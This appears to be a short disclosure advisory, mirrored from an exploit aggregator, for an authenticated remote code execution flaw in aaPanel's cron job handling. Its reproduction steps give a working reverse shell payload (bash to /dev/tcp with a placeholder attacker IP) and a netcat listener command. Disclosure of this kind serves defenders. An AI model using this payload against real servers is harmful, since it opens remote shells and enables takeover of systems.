Share
## https://sploitus.com/exploit?id=PACKETSTORM:209686
This is authenticated RCE.
    
    Vulnerability Description
    
    During my testing/evaluation of aaPanel, I identified a flaw in how cron
    jobs are handled, which enables an attacker to inject and execute arbitrary
    commands remotely. Specifically:
    
       -
    
       An authenticated user can manipulate cron job entries in a way that
       breaks out of the software to the server.
       -
    
       This leads to the execution of malicious code on the server hosting
       aaPanel, potentially compromising the entire system.
    
    Steps to Reproduce
    
       1.
    
       Log in to the aaPanel dashboard
    
       2.
    
       Create a new cron job with the payload:    bash -c "bash -i >& /dev/tcp/XXXX/1234 0>&1"   (XXXX is your ip)
    
       3.
    
       Save the cron job and trigger it (or wait for the scheduled execution).
       Start a listener on the other side to receive: nc -lvnp 1234
    
       4.
    
       Observe the execution of the injected command on the server and RCE.
    
       Many thanks,
    
       Alasdair Gorniak/Hamed Kohi